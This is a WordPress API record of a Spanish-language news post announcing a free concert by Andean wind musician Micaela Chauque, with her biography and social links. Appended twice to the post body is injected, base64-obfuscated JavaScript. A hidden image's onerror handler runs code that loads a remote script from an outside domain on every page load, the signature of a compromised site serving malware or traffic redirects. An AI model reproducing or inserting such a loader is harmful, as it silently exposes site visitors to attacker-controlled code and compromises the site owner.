{"id":2248,"date":"2023-02-19T23:27:32","date_gmt":"2023-02-20T02:27:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2248"},"modified":"2025-08-14T00:22:57","modified_gmt":"2025-08-14T03:22:57","slug":"micaela-chauque-presenta-20-anos-con-los-vientos-andinos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2248","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/micaela-chauque-presenta-20-anios-con-los-vientos-andinos-87963\">Micaela Chauque presenta \u00ab20 A\u00f1os con los vientos andinos\u00bb<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#cda535\"><em>Considerada una de las mejores int\u00e9rpretes de instrumentos de viento de origen andino, la compositora y coplista se presentar\u00e1 el s\u00e1bado 25 de febrero a las 20 horas, en el Anfiteatro de la Usina Cultural, Juramento y Espa\u00f1a.<\/em><\/h4>\n\n\n\n<p>En un recital al aire libre y con entrada gratuita,&nbsp;<strong>Micaela Chauque<\/strong>&nbsp;compartir\u00e1 canciones de ra\u00edz andina que integran los \u00e1lbumes: Instrumental de la Quebrada, Quenas y Sikus y Jallalla; trabajos discogr\u00e1ficos que contaron con artistas invitados que marcaron su carrera.<\/p>\n\n\n\n<p>Junto a su voz, el sonido de quenas, quenilla, sikus, toyo, caja y charango, propiciar\u00e1n un encuentro donde se evocar\u00e1n a los ancestros de nuestro norte.<\/p>\n\n\n\n<p>Su repertorio incluye sus primeras obras: El Saltar\u00edn, Alfonsina y el mar, Florcita de Card\u00f3n, Tengo bagualas y coplas, El Milagroso, Romance de viento y quena, y nuevas como Jallalla, con un final de carnavalitos, &nbsp;Soy de la Puna y Demasiado coraz\u00f3n.<\/p>\n\n\n\n<p>\u201c20 A\u00d1OS CON LOS VIENTOS ANDINOS\u201d, refleja el patrimonio viviente de la m\u00fasica de ra\u00edz andina del norte argentino y del resto de Los Andes.<\/p>\n\n\n\n<p><strong>Obra y trayectoria<\/strong><\/p>\n\n\n\n<p>Micaela Chauque fue la primera mujer de la Quebrada de Humahuaca que adopt\u00f3 la quena como instrumento, que por tradici\u00f3n lo ejecutan mayormente los hombres. En su paso por Tilcara, Ricardo Mollo la conoci\u00f3 y la sum\u00f3 a la gira nacional de Divididos de 2011.<\/p>\n\n\n\n<p>Hija de kollas, es luthier, docente y ha creado el Encuentro de Mujeres Artistas de la Quebrada llamado \u201cJallalla Warmi\u201d que en enero de 2023 se realiz\u00f3 por su 7ma. edici\u00f3n.<\/p>\n\n\n\n<p>Tambi\u00e9n forma parte de la Agrupaci\u00f3n de Comadres \u201cLas Warmis Alegres\u201d que celebran su evento cada \u201cjueves de comadre\u201d en Tilcara.<\/p>\n\n\n\n<p>Sus anteriores discos solistas son \u201cInstrumental de la Quebrada\u201d (2003) y \u201cQuenas y sikus en vivo\u201d (2008).<\/p>\n\n\n\n<p>A la vez, ha participado en trabajos discogr\u00e1ficos de otros artistas del folklore como Jaime Torres, Peteco Carabajal; la banda de rock Divididos y con \u00abTremor\u201d, m\u00fasica ecl\u00e9ctica y electr\u00f3nica.<\/p>\n\n\n\n<p>Multifac\u00e9tica, Micaela, forma parte de una nueva generaci\u00f3n de m\u00fasicos que irrumpe en el folclore trayendo un aire de renovaci\u00f3n a los sonidos de ra\u00edz ind\u00edgena.<\/p>\n\n\n\n<p>Es Licenciada en Folklore Argentino, y propone un repertorio enfocado a revalorizar compositores juje\u00f1os y de otras regiones andinas, con arreglos originales profundizando los recursos t\u00edmbricos, arm\u00f3nicos e interpretativos, manteniendo la esencia de la m\u00fasica del NOA y de los andes.<\/p>\n\n\n\n<p>A lo largo de su carrera, realiz\u00f3 presentaciones en el Festival Cosqu\u00edn 2023, Enero Tilcare\u00f1o, y Festival de la Pachamama 2019; y en festivales internacionales en Holanda, Espa\u00f1a, Italia, Portugal, Francia y B\u00e9lgica donde tuvo gran protagonismo.<\/p>\n\n\n\n<p>En 2019 recibi\u00f3 el Premio Gardel al Mejor \u00c1lbum folkl\u00f3rico de artista femenina.<\/p>\n\n\n\n<p>Su m\u00fasica ha sido relevada por los medios m\u00e1s importantes de la Argentina y el extranjero, como Diarios Clar\u00edn, La Naci\u00f3n, Tiempo Argentino; El Tribuno, Preg\u00f3n, Diario Uno, La Gaceta, Revistas Rolling Stone, y Viva, y &nbsp;tambi\u00e9n en medios extranjeros como BBC (UK), Radio Vaticana (Estado del Vaticano, Italia) y Australia.<\/p>\n\n\n\n<p>Actualmente es reconocida como una artista internacional del folklore del NOA y latinoamericano, la mayor exponente de la m\u00fasica andina argentina por una mujer ind\u00edgena.<\/p>\n\n\n\n<p>En redes sociales y plataformas pod\u00e9s encontrar su m\u00fasica en:<\/p>\n\n\n\n<p><a href=\"http:\/\/spotify%20https\/\/open.spotify.com\/artist\/6kXy0aOhcZi7ee7NIQmKFX?si=KgsMnWx6S-OJv2-PMtrwng\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/Spotify https:\/\/open.spotify.com\/artist\/6kXy0aOhcZi7ee7NIQmKFX?si=KgsMnWx6S-OJv2-PMtrwng<\/a><\/p>\n\n\n\n<p>Facebook\u00a0<a href=\"https:\/\/www.facebook.com\/MicaelaChauqueOficial\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/www.facebook.com\/MicaelaChauqueOficial<\/a><\/p>\n\n\n\n<p>Instagram:\u00a0<a href=\"https:\/\/www.salta.gob.ar\/www.instagram.com\/micaelachauque\/\" target=\"_blank\" rel=\"noopener\" title=\"\">www.instagram.com\/micaelachauque\/<\/a><\/p>\n\n\n\n<p>Youtube:\u00a0<a href=\"http:\/\/www.youtube.com\/@MicaelaChauqueOficial\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.youtube.com\/@MicaelaChauqueOficial<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/micaela-chauque-presenta-20-anios-con-los-vientos-andinos-87963\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Considerada una de las mejores int\u00e9rpretes de instrumentos de viento de origen andino, la compositora y coplista se presentar\u00e1 el s\u00e1bado 25 de febrero a las 20 horas, en el Anfiteatro de la Usina Cultural, Juramento y Espa\u00f1a. En un recital al aire libre y con entrada gratuita,&nbsp;Micaela Chauque&nbsp;compartir\u00e1 canciones de ra\u00edz andina que integran [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,15,17],"tags":[],"class_list":{"0":"post-2248","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-provincial","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2248"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2248"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2248\/revisions"}],"predecessor-version":[{"id":7171,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2248\/revisions\/7171"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2249"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}